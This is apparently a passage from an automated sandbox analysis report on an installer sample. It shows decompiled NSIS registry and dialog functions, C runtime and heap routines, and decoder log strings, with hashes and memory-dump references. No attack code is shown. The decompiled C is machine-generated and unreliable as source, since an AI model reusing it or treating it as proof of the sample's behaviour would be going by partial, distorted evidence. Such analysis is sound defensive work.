                                                • Associated: 00000004.00000002.493656469.0000000000400000.00000002.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.493675836.0000000000407000.00000002.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.493685746.0000000000409000.00000004.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.493695957.0000000000422000.00000004.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.493705633.000000000042A000.00000004.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.493715125.000000000042D000.00000002.00020000.sdmp Download File
                                                Similarity
                                                • API ID: Message$Send$ClientScreen
                                                • String ID: f
                                                • API String ID: 41195575-1993550816
                                                • Opcode ID: 3eee6e6f27995ada1ce6a04a907356a17faffc15d7d88bba2040e0493be19c46
                                                • Instruction ID: b5292072505f589c3e6e61736795eac3e8b5c463abbfbac9e5f2f3c06e421abf
                                                • Opcode Fuzzy Hash: 3eee6e6f27995ada1ce6a04a907356a17faffc15d7d88bba2040e0493be19c46
                                                • Instruction Fuzzy Hash: BE015275D00219BADB00DB94DC45BFEBBBCAB55715F10412BBB10B71C1C7B465418BA5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 1000CBA6, Relevance: 10.5, APIs: 7, Instructions: 45threadCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 91%
                                                			E1000CBA6(void* __ebx, void* __edi, void* __eflags) {
				void* __esi;
				void* _t3;
				intOrPtr _t6;
				long _t14;
				long* _t27;

				E10008836(_t3);
				if(E1000A00A() != 0) {
					_t6 = E10009B8B(E1000C988);
					 *0x1001bf40 = _t6;
					__eflags = _t6 - 0xffffffff;
					if(_t6 == 0xffffffff) {
						goto L1;
					} else {
						_t27 = E1000A3A9(1, 0x3bc);
						__eflags = _t27;
						if(_t27 == 0) {
							L6:
							E1000CC1C();
							__eflags = 0;
							return 0;
						} else {
							__eflags = E10009BE7( *0x1001bf40, _t27);
							if(__eflags == 0) {
								goto L6;
							} else {
								_push(0);
								_push(_t27);
								E1000CAF3(__ebx, __edi, _t27, __eflags);
								_t14 = GetCurrentThreadId();
								_t27[1] = _t27[1] | 0xffffffff;
								 *_t27 = _t14;
								__eflags = 1;
								return 1;
							}
						}
					}
				} else {
					L1:
					E1000CC1C();
					return 0;
				}
			}








                                                0x1000cba6
                                                0x1000cbb2
                                                0x1000cbc1
                                                0x1000cbc6
                                                0x1000cbcc
                                                0x1000cbcf
                                                0x00000000
                                                0x1000cbd1
                                                0x1000cbde
                                                0x1000cbe2
                                                0x1000cbe4
                                                0x1000cc13
                                                0x1000cc13
                                                0x1000cc18
                                                0x1000cc1b
                                                0x1000cbe6
                                                0x1000cbf4
                                                0x1000cbf6
                                                0x00000000
                                                0x1000cbf8
                                                0x1000cbf8
                                                0x1000cbfa
                                                0x1000cbfb
                                                0x1000cc02
                                                0x1000cc08
                                                0x1000cc0c
                                                0x1000cc10
                                                0x1000cc12
                                                0x1000cc12
                                                0x1000cbf6
                                                0x1000cbe4
                                                0x1000cbb4
                                                0x1000cbb4
                                                0x1000cbb4
                                                0x1000cbbb
                                                0x1000cbbb

                                                APIs
                                                • __init_pointers.LIBCMT ref: 1000CBA6
                                                  • Part of subcall function 10008836: RtlEncodePointer.NTDLL(00000000,00000001,1000CBAB,10012861,100196A0,00000008,10012A29,?,00000001,?,100196C0,0000000C,10012AF9,?,00000001,?), ref: 10008839
                                                  • Part of subcall function 10008836: __initp_misc_winsig.LIBCMT ref: 10008854
                                                  • Part of subcall function 10008836: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 10009C4C
                                                  • Part of subcall function 10008836: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 10009C60
                                                  • Part of subcall function 10008836: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 10009C73
                                                  • Part of subcall function 10008836: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 10009C86
                                                  • Part of subcall function 10008836: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 10009C99
                                                  • Part of subcall function 10008836: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 10009CAC
                                                  • Part of subcall function 10008836: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 10009CBF
                                                  • Part of subcall function 10008836: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 10009CD2
                                                  • Part of subcall function 10008836: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 10009CE5
                                                  • Part of subcall function 10008836: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 10009CF8
                                                  • Part of subcall function 10008836: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 10009D0B
                                                  • Part of subcall function 10008836: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 10009D1E
                                                  • Part of subcall function 10008836: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 10009D31
                                                  • Part of subcall function 10008836: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 10009D44
                                                  • Part of subcall function 10008836: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 10009D57
                                                  • Part of subcall function 10008836: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 10009D6A
                                                • __mtinitlocks.LIBCMT ref: 1000CBAB
                                                • __mtterm.LIBCMT ref: 1000CBB4
                                                • __calloc_crt.LIBCMT ref: 1000CBD9
                                                • __initptd.LIBCMT ref: 1000CBFB
                                                • GetCurrentThreadId.KERNEL32(10012861,100196A0,00000008,10012A29,?,00000001,?,100196C0,0000000C,10012AF9,?,00000001,?), ref: 1000CC02
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.497246318.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000004.00000002.497232899.0000000010000000.00000002.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.497307012.0000000010014000.00000002.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.497331845.000000001001A000.00000004.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.497358884.000000001001F000.00000002.00020000.sdmp Download File
                                                Similarity
                                                • API ID: AddressProc$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm
                                                • String ID:
                                                • API String ID: 1593083391-0
                                                • Opcode ID: cb7e5e6cfeb87975e320105455a0c0544134e6ae18d332925f911c74d4e43c03
                                                • Instruction ID: 8fbe05b69add9fc393a99863cab2729825c83d114e8626461645e52e432fd137
                                                • Opcode Fuzzy Hash: cb7e5e6cfeb87975e320105455a0c0544134e6ae18d332925f911c74d4e43c03
                                                • Instruction Fuzzy Hash: A6F0963621972519F224E775BC03F8A36C4DB026F4F14466EF454D50DEEF20A9828551
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00402B6E, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 100%
                                                			E00402B6E(struct HWND__* _a4, intOrPtr _a8) {
				char _v68;
				int _t11;
				int _t20;

				if(_a8 == 0x110) {
					SetTimer(_a4, 1, 0xfa, 0);
					_a8 = 0x113;
				}
				if(_a8 == 0x113) {
					_t20 =  *0x40b0d8; // 0x8200
					_t11 =  *0x41f0e8;
					if(_t20 >= _t11) {
						_t20 = _t11;
					}
					wsprintfA( &_v68, "verifying installer: %d%%", MulDiv(_t20, 0x64, _t11));
					SetWindowTextA(_a4,  &_v68);
					SetDlgItemTextA(_a4, 0x406,  &_v68);
				}
				return 0;
			}






                                                0x00402b7b
                                                0x00402b89
                                                0x00402b8f
                                                0x00402b8f
                                                0x00402b9d
                                                0x00402b9f
                                                0x00402ba5
                                                0x00402bac
                                                0x00402bae
                                                0x00402bae
                                                0x00402bc4
                                                0x00402bd4
                                                0x00402be6
                                                0x00402be6
                                                0x00402bee

                                                APIs
                                                • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402B89
                                                • MulDiv.KERNEL32 ref: 00402BB4
                                                • wsprintfA.USER32 ref: 00402BC4
                                                • SetWindowTextA.USER32(?,?), ref: 00402BD4
                                                • SetDlgItemTextA.USER32(?,00000406,?), ref: 00402BE6
                                                Strings
                                                • verifying installer: %d%%, xrefs: 00402BBE
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.493663175.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000004.00000002.493656469.0000000000400000.00000002.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.493675836.0000000000407000.00000002.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.493685746.0000000000409000.00000004.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.493695957.0000000000422000.00000004.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.493705633.000000000042A000.00000004.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.493715125.000000000042D000.00000002.00020000.sdmp Download File
                                                Similarity
                                                • API ID: Text$ItemTimerWindowwsprintf
                                                • String ID: verifying installer: %d%%
                                                • API String ID: 1451636040-82062127
                                                • Opcode ID: 82db8536561177d1b172f5ac56095865a7e50fae45f9622e7ddcc8e846317807
                                                • Instruction ID: c6984150c403b35497dc18a40ce28a5dc8b104db4e9527dfc76b44ca96ff41d6
                                                • Opcode Fuzzy Hash: 82db8536561177d1b172f5ac56095865a7e50fae45f9622e7ddcc8e846317807
                                                • Instruction Fuzzy Hash: 5D01FF70A44208BBEB209F60DD49EEE3769FB04345F008039FA06A92D1D7B5AA558F99
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 10001100, Relevance: 9.0, APIs: 2, Strings: 3, Instructions: 286COMMON
                                                Download Yara Rule
                                                Strings
                                                • setting window to 0x%X, xrefs: 1000134D
                                                • decoding stream of size %u to size %u, starting at %u, xrefs: 1000115F
                                                • E8 transform detected; file size %u, xrefs: 1000142A
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.497246318.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000004.00000002.497232899.0000000010000000.00000002.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.497307012.0000000010014000.00000002.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.497331845.000000001001A000.00000004.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.497358884.000000001001F000.00000002.00020000.sdmp Download File
                                                Similarity
                                                • API ID:
                                                • String ID: E8 transform detected; file size %u$decoding stream of size %u to size %u, starting at %u$setting window to 0x%X
                                                • API String ID: 0-4286174769
                                                • Opcode ID: 347821c0b590c84ff46a00d1acb6a352d551c073a430cad62b225cf9ebc3db1c
                                                • Instruction ID: 6d95b11c59b3497aea08d982f272f40bd572d12cc0e65c72e8296be602c26041
                                                • Opcode Fuzzy Hash: 347821c0b590c84ff46a00d1acb6a352d551c073a430cad62b225cf9ebc3db1c
                                                • Instruction Fuzzy Hash: 92E19FB4904209DFDB04CFA8D590AEEBBF1FF48344F208519E849A7345D775A985CFA2
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00402336, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 71registrystringCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 85%
                                                			E00402336(void* __eax) {
				void* _t15;
				char* _t18;
				int _t19;
				char _t24;
				int _t27;
				signed int _t30;
				intOrPtr _t35;
				void* _t37;

				_t15 = E00402B1E(__eax);
				_t35 =  *((intOrPtr*)(_t37 - 0x18));
				 *(_t37 - 0x34) =  *(_t37 - 0x14);
				 *(_t37 - 0x38) = E00402A29(2);
				_t18 = E00402A29(0x11);
				_t30 =  *0x423ff0; // 0x0
				 *(_t37 - 4) = 1;
				_t19 = RegCreateKeyExA(_t15, _t18, _t27, _t27, _t27, _t30 | 0x00000002, _t27, _t37 + 8, _t27);
				if(_t19 == 0) {
					if(_t35 == 1) {
						E00402A29(0x23);
						_t19 = lstrlenA(0x40a410) + 1;
					}
					if(_t35 == 4) {
						_t24 = E00402A0C(3);
						 *0x40a410 = _t24;
						_t19 = _t35;
					}
					if(_t35 == 3) {
						_t19 = E00402E8E( *((intOrPtr*)(_t37 - 0x1c)), _t27, 0x40a410, 0xc00);
					}
					if(RegSetValueExA( *(_t37 + 8),  *(_t37 - 0x38), _t27,  *(_t37 - 0x34), 0x40a410, _t19) == 0) {
						 *(_t37 - 4) = _t27;
					}
					_push( *(_t37 + 8));
					RegCloseKey();
				}
				 *0x423fc8 =  *0x423fc8 +  *(_t37 - 4);
				return 0;
			}











                                                0x00402337
                                                0x0040233c
                                                0x00402346
                                                0x00402350
                                                0x00402353
                                                0x0040235d
                                                0x0040236d
                                                0x00402374
                                                0x0040237c
                                                0x0040238a
                                                0x0040238e
                                                0x00402399
                                                0x00402399
                                                0x0040239d
                                                0x004023a1
                                                0x004023a7
                                                0x004023ac
                                                0x004023ac
                                                0x004023b0
                                                0x004023bc
                                                0x004023bc
                                                0x004023d5
                                                0x004023d7
                                                0x004023d7
                                                0x004023da
                                                0x004024b0
                                                0x004024b0
                                                0x004028c1
                                                0x004028cd

                                                APIs
                                                • RegCreateKeyExA.ADVAPI32(00000000,00000000,?,?,?,00000000,?,?), ref: 00402374
                                                • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsf86CE.tmp,00000023,?,?,?,00000000,?,?,?,00000011,00000002), ref: 00402394
                                                • RegSetValueExA.ADVAPI32(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsf86CE.tmp,00000000), ref: 004023CD
                                                • RegCloseKey.ADVAPI32(?), ref: 004024B0
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.493663175.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000004.00000002.493656469.0000000000400000.00000002.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.493675836.0000000000407000.00000002.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.493685746.0000000000409000.00000004.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.493695957.0000000000422000.00000004.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.493705633.000000000042A000.00000004.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.493715125.000000000042D000.00000002.00020000.sdmp Download File
                                                Similarity
                                                • API ID: CloseCreateValuelstrlen
                                                • String ID: C:\Users\user\AppData\Local\Temp\nsf86CE.tmp
                                                • API String ID: 1356686001-3249194528
                                                • Opcode ID: 9bf654010a188213ed9da3fb996897beb0b6485406045e6761b6e0bfc6b57b1d
                                                • Instruction ID: e6eb4e552242eddf296ff96e6d07a7eb6613d299afeb9756830ee7ce8f9eb162
                                                • Opcode Fuzzy Hash: 9bf654010a188213ed9da3fb996897beb0b6485406045e6761b6e0bfc6b57b1d
                                                • Instruction Fuzzy Hash: 7111A271E00108BFEB10EFA5DE8DEAF7678EB40758F10443AF505B31D0C6B85D419A69
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00402A69, Relevance: 7.6, APIs: 5, Instructions: 67registryCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 84%
                                                			E00402A69(void* _a4, char* _a8, long _a12) {
				void* _v8;
				char _v272;
				signed char _t16;
				long _t18;
				long _t25;
				intOrPtr* _t27;
				long _t28;

				_t16 =  *0x423ff0; // 0x0
				_t18 = RegOpenKeyExA(_a4, _a8, 0, _t16 | 0x00000008,  &_v8);
				if(_t18 == 0) {
					while(RegEnumKeyA(_v8, 0,  &_v272, 0x105) == 0) {
						__eflags = _a12;
						if(_a12 != 0) {
							RegCloseKey(_v8);
							L8:
							__eflags = 1;
							return 1;
						}
						_t25 = E00402A69(_v8,  &_v272, 0);
						__eflags = _t25;
						if(_t25 != 0) {
							break;
						}
					}
					RegCloseKey(_v8);
					_t27 = E00405F28(4);
					if(_t27 == 0) {
						__eflags =  *0x423ff0; // 0x0
						if(__eflags != 0) {
							goto L8;
						}
						_t28 = RegDeleteKeyA(_a4, _a8);
						__eflags = _t28;
						if(_t28 != 0) {
							goto L8;
						}
						return _t28;
					}
					return  *_t27(_a4, _a8,  *0x423ff0, 0);
				}
				return _t18;
			}










                                                0x00402a79
                                                0x00402a8a
                                                0x00402a92
                                                0x00402aba
                                                0x00402aa1
                                                0x00402aa4
                                                0x00402af4
                                                0x00402afa
                                                0x00402afc
                                                0x00000000
                                                0x00402afc
                                                0x00402ab1
                                                0x00402ab6
                                                0x00402ab8
                                                0x00000000
                                                0x00000000
                                                0x00402ab8
                                                0x00402acf
                                                0x00402ad7
                                                0x00402ade
                                                0x00402b04
                                                0x00402b0a
                                                0x00000000
                                                0x00000000
                                                0x00402b12
                                                0x00402b18
                                                0x00402b1a
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00402b1a
                                                0x00000000
                                                0x00402aed
                                                0x00402b01

                                                APIs
                                                • RegOpenKeyExA.ADVAPI32(?,?,00000000,00000000,?), ref: 00402A8A
                                                • RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402AC6
                                                • RegCloseKey.ADVAPI32(?), ref: 00402ACF
                                                • RegCloseKey.ADVAPI32(?), ref: 00402AF4
                                                • RegDeleteKeyA.ADVAPI32(?,?), ref: 00402B12
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.493663175.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000004.00000002.493656469.0000000000400000.00000002.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.493675836.0000000000407000.00000002.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.493685746.0000000000409000.00000004.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.493695957.0000000000422000.00000004.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.493705633.000000000042A000.00000004.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.493715125.000000000042D000.00000002.00020000.sdmp Download File
                                                Similarity
                                                • API ID: Close$DeleteEnumOpen
                                                • String ID:
                                                • API String ID: 1912718029-0
                                                • Opcode ID: 5d0b6e0ce49e1b9a68b8278243b858d166325889e329a7d8d46ece79ca10f327
                                                • Instruction ID: fd754328231b90d3809392cacc3778cc58b9849b8c5c25df110c081a09ace752
                                                • Opcode Fuzzy Hash: 5d0b6e0ce49e1b9a68b8278243b858d166325889e329a7d8d46ece79ca10f327
                                                • Instruction Fuzzy Hash: 29116D71A0000AFEDF219F90DE49DAE3B79FB14345B104076FA05A00E0DBB89E51AFA9
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 1000D06A, Relevance: 7.6, APIs: 5, Instructions: 67COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 96%
                                                			E1000D06A(void* __ebx, void* __edx, void* __edi, void* _a4, long _a8) {
				void* _t7;
				long _t8;
				intOrPtr* _t9;
				intOrPtr* _t12;
				long _t20;
				long _t31;

				if(_a4 != 0) {
					_t31 = _a8;
					__eflags = _t31;
					if(_t31 != 0) {
						_push(__ebx);
						while(1) {
							__eflags = _t31 - 0xffffffe0;
							if(_t31 > 0xffffffe0) {
								break;
							}
							__eflags = _t31;
							if(_t31 == 0) {
								_t31 = _t31 + 1;
								__eflags = _t31;
							}
							_t7 = HeapReAlloc( *0x1001dc40, 0, _a4, _t31);
							_t20 = _t7;
							__eflags = _t20;
							if(_t20 != 0) {
								L17:
								_t8 = _t20;
							} else {
								__eflags =  *0x1001dc3c - _t7;
								if(__eflags == 0) {
									_t9 = E1000983A(__eflags);
									 *_t9 = E10009881(GetLastError());
									goto L17;
								} else {
									__eflags = E10009807(_t7, _t31);
									if(__eflags == 0) {
										_t12 = E1000983A(__eflags);
										 *_t12 = E10009881(GetLastError());
										L12:
										_t8 = 0;
										__eflags = 0;
									} else {
										continue;
									}
								}
							}
							goto L14;
						}
						E10009807(_t6, _t31);
						 *((intOrPtr*)(E1000983A(__eflags))) = 0xc;
						goto L12;
					} else {
						E1000A32A(_a4);
						_t8 = 0;
					}
					L14:
					return _t8;
				} else {
					return E1000591F(__ebx, __edx, __edi, _a8);
				}
			}









                                                0x1000d071
                                                0x1000d07f
                                                0x1000d082
                                                0x1000d084
                                                0x1000d093
                                                0x1000d0c6
                                                0x1000d0c6
                                                0x1000d0c9
                                                0x00000000
                                                0x00000000
                                                0x1000d096
                                                0x1000d098
                                                0x1000d09a
                                                0x1000d09a
                                                0x1000d09a
                                                0x1000d0a7
                                                0x1000d0ad
                                                0x1000d0af
                                                0x1000d0b1
                                                0x1000d111
                                                0x1000d111
                                                0x1000d0b3
                                                0x1000d0b3
                                                0x1000d0b9
                                                0x1000d0fb
                                                0x1000d10f
                                                0x00000000
                                                0x1000d0bb
                                                0x1000d0c2
                                                0x1000d0c4
                                                0x1000d0e3
                                                0x1000d0f7
                                                0x1000d0dd
                                                0x1000d0dd
                                                0x1000d0dd
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x1000d0c4
                                                0x1000d0b9
                                                0x00000000
                                                0x1000d0df
                                                0x1000d0cc
                                                0x1000d0d7
                                                0x00000000
                                                0x1000d086
                                                0x1000d089
                                                0x1000d08f
                                                0x1000d08f
                                                0x1000d0e0
                                                0x1000d0e2
                                                0x1000d073
                                                0x1000d07d
                                                0x1000d07d

                                                APIs
                                                • _malloc.LIBCMT ref: 1000D076
                                                  • Part of subcall function 1000591F: __FF_MSGBANNER.LIBCMT ref: 10005936
                                                  • Part of subcall function 1000591F: __NMSG_WRITE.LIBCMT ref: 1000593D
                                                  • Part of subcall function 1000591F: RtlAllocateHeap.NTDLL(005A0000,00000000,00000001,?,?,?,?,10003D2C), ref: 10005962
                                                • _free.LIBCMT ref: 1000D089
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.497246318.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000004.00000002.497232899.0000000010000000.00000002.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.497307012.0000000010014000.00000002.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.497331845.000000001001A000.00000004.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.497358884.000000001001F000.00000002.00020000.sdmp Download File
                                                Similarity
                                                • API ID: AllocateHeap_free_malloc
                                                • String ID:
                                                • API String ID: 1020059152-0
                                                • Opcode ID: 8b1ed2aa7eabe4bd22de2cddccfdb6ae4c005e2958cc87990c05da668bc3cf15
                                                • Instruction ID: aad7ab1cb34914432ac4bacb246f22d2d5f71633821f67d74deb23b6b735991f
                                                • Opcode Fuzzy Hash: 8b1ed2aa7eabe4bd22de2cddccfdb6ae4c005e2958cc87990c05da668bc3cf15
                                                • Instruction Fuzzy Hash: D411C132804226ABFB25BF709C4574E3BC4EF022E4F20C527F94C9A259DF319A4287B0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00401CDE, Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 100%
                                                			E00401CDE(int __edx) {
				void* _t17;
				struct HINSTANCE__* _t21;
				struct HWND__* _t25;
				void* _t27;

				_t25 = GetDlgItem( *(_t27 - 8), __edx);
				GetClientRect(_t25, _t27 - 0x50);
				_t17 = SendMessageA(_t25, 0x172, _t21, LoadImageA(_t21, E00402A29(_t21), _t21,  *(_t27 - 0x48) *  *(_t27 - 0x20),  *(_t27 - 0x44) *  *(_t27 - 0x20), 0x10));
				if(_t17 != _t21) {
					DeleteObject(_t17);
				}
				 *0x423fc8 =  *0x423fc8 +  *((intOrPtr*)(_t27 - 4));
				return 0;
			}







                                                0x00401ce8
                                                0x00401cef
                                                0x00401d1e
                                                0x00401d26
                                                0x00401d2d
                                                0x00401d2d
                                                0x004028c1
                                                0x004028cd

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.493663175.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000004.00000002.493656469.0000000000400000.00000002.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.493675836.0000000000407000.00000002.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.493685746.0000000000409000.00000004.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.493695957.0000000000422000.00000004.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.493705633.000000000042A000.00000004.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.493715125.000000000042D000.00000002.00020000.sdmp Download File
                                                Similarity
                                                • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                • String ID:
                                                • API String ID: 1849352358-0
                                                • Opcode ID: b6dc52a7f50dc5a5b8d69a970bc0364d2e288b966cb10631b9234e7e7e1bdde9
                                                • Instruction ID: 6b5de524c76fb4cd20547a313357388a8ed9b6ad8842e2156e420fd608a0a23d
                                                • Opcode Fuzzy Hash: b6dc52a7f50dc5a5b8d69a970bc0364d2e288b966cb10631b9234e7e7e1bdde9
                                                • Instruction Fuzzy Hash: 75F0EC72A04118AFD701EBA4DE88DAFB77CFB44305B14443AF501F6190C7749D019B79
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00404649, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84stringCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 77%
                                                			E00404649(int _a4, intOrPtr _a8, signed int _a12, signed int _a16) {
				char _v36;
				char _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t21;
				signed int _t22;
				void* _t29;
				void* _t31;
				void* _t32;
				void* _t41;
				signed int _t43;
				signed int _t47;
				signed int _t50;
				signed int _t51;
				signed int _t53;

				_t21 = _a16;
				_t51 = _a12;
				_t41 = 0xffffffdc;
				if(_t21 == 0) {
					_push(0x14);
					_pop(0);
					_t22 = _t51;
					if(_t51 < 0x100000) {
						_push(0xa);
						_pop(0);
						_t41 = 0xffffffdd;
					}
					if(_t51 < 0x400) {
						_t41 = 0xffffffde;
					}
					if(_t51 < 0xffff3333) {
						_t50 = 0x14;
						asm("cdq");
						_t22 = 1 / _t50 + _t51;
					}
					_t23 = _t22 & 0x00ffffff;
					_t53 = _t22 >> 0;
					_t43 = 0xa;
					_t47 = ((_t22 & 0x00ffffff) + _t23 * 4 + (_t22 & 0x00ffffff) + _t23 * 4 >> 0) % _t43;
				} else {
					_t53 = (_t21 << 0x00000020 | _t51) >> 0x14;
					_t47 = 0;
				}
				_t29 = E00405BBA(_t41, _t47, _t53,  &_v36, 0xffffffdf);
				_t31 = E00405BBA(_t41, _t47, _t53,  &_v68, _t41);
				_t32 = E00405BBA(_t41, _t47, 0x420538, 0x420538, _a8);
				wsprintfA(_t32 + lstrlenA(0x420538), "%u.%u%s%s", _t53, _t47, _t31, _t29);
				return SetDlgItemTextA( *0x423718, _a4, 0x420538);
			}



















                                                0x0040464f
                                                0x00404654
                                                0x0040465c
                                                0x0040465d
                                                0x0040466a
                                                0x00404672
                                                0x00404673
                                                0x00404675
                                                0x00404677
                                                0x00404679
                                                0x0040467c
                                                0x0040467c
                                                0x00404683
                                                0x00404689
                                                0x00404689
                                                0x00404690
                                                0x00404697
                                                0x0040469a
                                                0x0040469d
                                                0x0040469d
                                                0x004046a1
                                                0x004046b1
                                                0x004046b3
                                                0x004046b6
                                                0x0040465f
                                                0x0040465f
                                                0x00404666
                                                0x00404666
                                                0x004046be
                                                0x004046c9
                                                0x004046df
                                                0x004046ef
                                                0x0040470b

                                                APIs
                                                • lstrlenA.KERNEL32(00420538,00420538,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404564,000000DF,00000000,00000400,?), ref: 004046E7
                                                • wsprintfA.USER32 ref: 004046EF
                                                • SetDlgItemTextA.USER32(?,00420538), ref: 00404702
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.493663175.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000004.00000002.493656469.0000000000400000.00000002.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.493675836.0000000000407000.00000002.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.493685746.0000000000409000.00000004.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.493695957.0000000000422000.00000004.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.493705633.000000000042A000.00000004.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.493715125.000000000042D000.00000002.00020000.sdmp Download File
                                                Similarity
                                                • API ID: ItemTextlstrlenwsprintf
                                                • String ID: %u.%u%s%s
                                                • API String ID: 3540041739-3551169577
                                                • Opcode ID: 9ec326ac30901ad515aaf80f2404a58f9bab4133aba90e091d0e9c932beca6f7
                                                • Instruction ID: 33c490f36d39f428f4b6feb88c055206d8f5fbd89635bf607d329e374d543c8d
                                                • Opcode Fuzzy Hash: 9ec326ac30901ad515aaf80f2404a58f9bab4133aba90e091d0e9c932beca6f7
                                                • Instruction Fuzzy Hash: 5A11D873A0512437EB0065699C41EAF329CDB82335F150637FE26F31D1E9B9DD1145E8
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 10004150, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 78COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 44%
                                                			E10004150(void* __ebx, void* __edi, void* __fp0, char* _a4) {
				signed int _v8;
				signed int _v12;
				char _v13;
				void* _v14;
				signed int _v20;
				intOrPtr _v24;
				char* _v28;
				signed char _t50;
				char* _t54;
				char* _t71;
				char* _t76;
				signed int _t82;
				char** _t90;

				_v8 = 0;
				_v12 = 0;
				_t71 = _a4;
				_t92 =  *(_t71 + 0x18) & 0x0000000f;
				_t82 = 1;
				_v13 = 1;
				if(( *(_t71 + 0x18) & 0x0000000f) != 0) {
					 *_t90 = L"(dec->bit_pos & 0xF) == 0";
					_v28 = L"Source.c";
					_v24 = 0xaa;
